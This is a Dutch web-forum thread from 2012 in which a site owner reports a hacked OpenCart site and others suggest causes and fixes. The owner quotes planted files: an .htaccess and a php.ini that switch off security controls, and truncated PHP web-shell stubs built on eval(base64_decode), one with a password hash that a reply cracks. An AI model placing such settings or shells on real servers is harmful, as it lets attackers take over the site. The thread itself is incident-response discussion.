Website gehacked - Privacy en beveiliging

dinsdag 3 juli 2012 16:51

Acties:

Topicstarter

Ik zag laatst op m'n ftp opeens rare bestanden en kon niet meer in de admin inloggen. Toen zag ik dus dat ik gehacked was. Heb alles verwijderd en hersteld en m'n wachtwoord op ftp veranderd, maar nu is hetzelfde weer gebeurd en is een map met plaatjes verwijderd. Ik heb geen idee hoe ze nou kunnen inbreken?

De bestanden waren onder andere:

.htaccess

<IfModule mod_security.c>
Sec------Engine Off
Sec------ScanPOST Off
</IfModule>

php.ini

safe_mode=OFF
disable_functions=NONE

dark.php

<?php

$auth_pass = "4fa21546ef0bd284ae6b597acf40ed74";
$default_charset = 'windows-1250'; // Do wyboru: 'utf-8', 'windows-1250', 'windows-1251', 'iso-8859-1', 'iso-8859-2'
$color = "#6EB500"; // Kolor: Zielony
$default_use_ajax = true; // UÅ¼ywanie AJAX'a TAK - true, NIE - false

eval(base64_decode

wp-tag.php

<?php
/*
Private x0rg Web Hosting Bypass (phpshell)
*/
eval("?>".gzuncompress(base64_decode

etc. etc. het is dus wel vrij duidelijk wat er gebeurt op zich...(script zelf is gecodeerd) maar ik snap niet hoe ze zit kunnen doen? Wat kan ik nou doen om dit tegen te gaan? De website gebruikt OpenCart, zit er daar een bug of iets in? Verder staan sommige mappen op 755 rechten, maar dat moet anders werkt het niet.

De webhost zegt dat er niet is ingelogd op de datum dat deze bestanden waren aangemaakt.

Facts don't care about your feelings

dinsdag 3 juli 2012 16:52

Acties:

Verwijderd

Het lijkt dan bijna alsof er iets bij de host gebeurt, in plaats van bij jou.

[ Voor 11% gewijzigd door Verwijderd op 03-07-2012 16:57 ]

dinsdag 3 juli 2012 16:55

Acties:

KatirZan

Wandelende orgaanzak

Uhm...hoe "zag" je dat je gehacked was?

Ik zie hier namelijk niet echt vreemde dingen in...

Ik zou eerst eens bij je provider/host informeren....voordat je begint te schreeuwen dat je gehacked bent...

Wabbawabbawabbawabba

dinsdag 3 juli 2012 16:56

Acties:

YoshiBignose

Topicstarter

Nou hetzelfde gebeurde dus ook op een andere site van me (met Joomla) en die zijn gehost op de zelfde resellerhosting bij die webhost. Je moet natuurlijk altijd eerst het probleem bij jezelf zoeken, maar de mogelijkheid dat het de webhost is, is dus ook aanwezig?

Facts don't care about your feelings

dinsdag 3 juli 2012 16:56

Acties:

NeOTheMaTriXM

Of het bij de host ligt of niet, maar er heeft een hack plaats gevonden:

De phpshell op het eind, zegt al meer dan genoeg:
http://r00tsecurity.org/f...osting-bypasser-phpshell/

dinsdag 3 juli 2012 16:58

Acties:

webinn

waarschijnlijk via een lek in je code (gebruik je wel de laatste versie van joomla?)

dinsdag 3 juli 2012 16:59

Acties:

YoshiBignose

Topicstarter

Inderdaad, heb een paar van die codes gegoogled en kwam ook op van die hack forums terecht. De vraag is, welke stappen moet ik nu ondernemen om te kijken wat de oorzaak is? FTP wachtwoord is gewijzigd, het lijkt me niet dat ze zo zijn ingelogd (daar hebben ze immers die bestanden enzo dan niet voor nodig als ze dat konden) dus het moet via een andere weg. Maar ik heb te weinig verstand ervan om te weten hoe dat moet

Er zullen toch wel hackers hier zitten die precies weten hoe je te werk moet gaan en wat ik dus moet doen om dit tegen te gaan

In dit geval gaat het om OpenCart, het is de nieuwste versie. Gebruik wel VQMOD met extensies. Kan het in de extensies zitten?

[ Voor 10% gewijzigd door YoshiBignose op 03-07-2012 16:59 ]

Facts don't care about your feelings

dinsdag 3 juli 2012 17:10

Acties:

NeOTheMaTriXM

Zoals webinn zegt: lek in je code. In dit geval Joomla of wat ik waarschijnlijker vind, in een van de plugins.

Heb je al gekeken naar de datum van deze bestanden? Mogelijk namelijk dat de hack al eerder heeft plaats gevonden? En dat dmv de autoupdate functie (ik neem aan dat Joomla die heeft

) de foutieve plugin al geupdate is.

Tevens is het handig om na te gaan of er exploits bekend zijn voor de plugins die je gebruikt.

dinsdag 3 juli 2012 17:30

Acties:

YoshiBignose

Topicstarter

Dus als ik nu alles update naar nieuwste versie en alle extensions zou verwijderen dan moet ik in principe veilig zitten?

Facts don't care about your feelings

dinsdag 3 juli 2012 21:53

Acties:

lordgandalf

VQmod heeft mogelijk het wel makkelijker gemaakt om je site aan te passen en zo stuff te uploaden.
En ik zou opnieuw installeren en even je db data checken

Steam: Profile / Socialclub: Profile / Uplay: minedwarf / Origin: lordgandalf3

dinsdag 3 juli 2012 21:57

Acties:

dimako_

Vogel

Ik heb ook zoiets laatst gehad met een klant.
hoogstwaarschijnlijk komt dat doordat de klant zijn pc is besmet met virus-achtig iets en die zoekt naar ftp wachtwoorden. klant gebruikt filezilla en filezilla slaat de wachtwoorden zonder beveiliging in een xml bestand op.
Dus dan kan het virus zo aan de slag met die bestanden.....

dinsdag 3 juli 2012 22:08

Acties:

yeehaw

Meestal worden er hele ip-ranges afgelopen met een tool die automatisch naar bekende exploits in Joomla, Wordpress, Drupal enz zoekt en deze uitbuit.

De oplossing is dan inderdaad om te updaten naar de nieuwste versie van je CMS. Verder kan het ook zo zijn dat het in het beheerpaneel van je hosting partij zit. Als die bijvoorbeeld Plesk of directadmin gebruiken en daar zit een lek in maakt het niet uit of jouw website up to date is.

Ik zou na het updaten van Joomla eens controleren welke plugins je gebruikt en op bijvoorbeeld http://www.exploit-db.com/ kijken of hier exploits staan van deze plugins. Deze kan je dan patchen of helemaal niet meer gebruiken.

IMO is het geen goed idee om Joomla te gebruiken daar er echt enorm veel vulnerabilities en slechte plugins voor zijn. Kiezen voor Wordpress of Drupal is al wat veiliger. Echter zijn er ook daarvoor plugins die slecht geschreven zijn.

vrijdag 20 juli 2012 11:52

Acties:

THA_ErAsEr

Het is niet zo moeilijk om dit te verwezelijken als je de kennis of gewoon al de tools hebt. Je hebt security tools die je hele website afspeuren naar exploits.

De vraag is natuurlijk wel waarom een hacker jou zou willen hacken...

Zeker dat er niemand is die je credentials kent of toegang tot je pc heeft?

vrijdag 20 juli 2012 12:28

Acties:

alt-92

ye olde farte

THA_ErAsEr schreef op vrijdag 20 juli 2012 @ 11:52:
De vraag is natuurlijk wel waarom een hacker jou zou willen hacken...

Die is echt niet geinteresseerd in YBN an sich maar 'gewoon' op zoek naar een vulnerable host waar je mis/ge/bruik van kan maken.
Je bent niet 'het' target van een aanval, maar 'een' target. Een van de velen.

[ Voor 11% gewijzigd door alt-92 op 20-07-2012 12:29 ]

ik heb een 864 GB floppydrive! - certified prutser - the social skills of a thermonuclear device

zaterdag 21 juli 2012 20:31

Acties:

LuckY

reinstall even je hele CMS met alle updates en update ook alle modules.

Daarna zou je er met wat basis scanners(joomscan) overheen kunnen gaan om te checken wat er lek is.

Heb je toevallig acceslogs? Misschien kan je hierin terug vinden of het van jou site kwam, of van de hoster.

zondag 22 juli 2012 11:56

Acties:

army

The root of a lot of evil

Even hypothetisch, maar wel vaak toegepast. De webserver kan de bestanden in de documentroot gewoon aanpassen omdat ze onder dezelfde gebruiker werken. Dit lijkt handig om zo via een webinterface de webapplicatie te updaten of plugins te installeren, maar wat jij kan is dus ook mogelijk voor een derde partij als ze handig bezig zijn. Dit kan door een fout in PHP-code bijvoorbeeld en het toestaan van eval() is een doodzone, of door de javascript in een comment te zetten bv die door de admin zijn browser wordt uitgevoerd op het moment dat hij ze doorleest en/of beoordeelt. Sommige apps hebben ook een soort cron-functie die hetzelfde kan triggeren. Als je dit door webhosters en developers structureel wordt aangepakt blijven we dit soort dingen houden helaas. Tot die tijd blijft het zo snel mogelijk patchen van alles de enige optie.

"I don't have hard drives. I just keep 30 chinese teenagers in my basement and force them to memorize numbers." — ikkenai

zondag 22 juli 2012 12:00

Acties:

CyBeR

💩

KatirZan schreef op dinsdag 03 juli 2012 @ 16:55:
Uhm...hoe "zag" je dat je gehacked was?

Ik zie hier namelijk niet echt vreemde dingen in...

Euh, niet?

Want dit is normaal?

code:

1	eval("?>".gzuncompress(base64_decode

Ik schrijf m'n code idd ook latijd in base64 met gzip gecomprimeerd.

All my posts are provided as-is. They come with NO WARRANTY at all.

zondag 22 juli 2012 13:08

Acties:

Squ1zZy

Ze hebben admin rechten gekregen en later pas de files geupload. Lijkt mij een SQL injectie, Cross Site Scripting of Expression Language Injection geweest. Stuur me je site eens door via DM. Wil wel eens kijken.

De MD5 hash in Dark.php is "haderwashere". Je hebt dus al een nick "Hader"

Edit: De eerste decrypt was op Sun 15th Apr,2012 04:45 pm. Hij is al even actief dus.

Je maakt gebruik van openCart. Gezien jouw site (ga ik niet vanuit tenminste) niet wereldwijd gebruikt wordt en populair is, hebben ze jouw site gevonden via google dork. Ze zoeken naar websites die openCart gebruiken in combinatie met een versienummer die de vulnerablities bevatten b.v.

Zo kunnen ze ook op jouw site terecht gekomen zijn. Als men goed is kunnen ze zelf scripten en automatisch de vulnerablity toepassen en alles uploaden, exploiten etc en de wachtwoorden doorsturen b.v.

Zo hack je 1000´en sites op een dag als het moet ..

[ Voor 55% gewijzigd door Squ1zZy op 22-07-2012 13:24 ]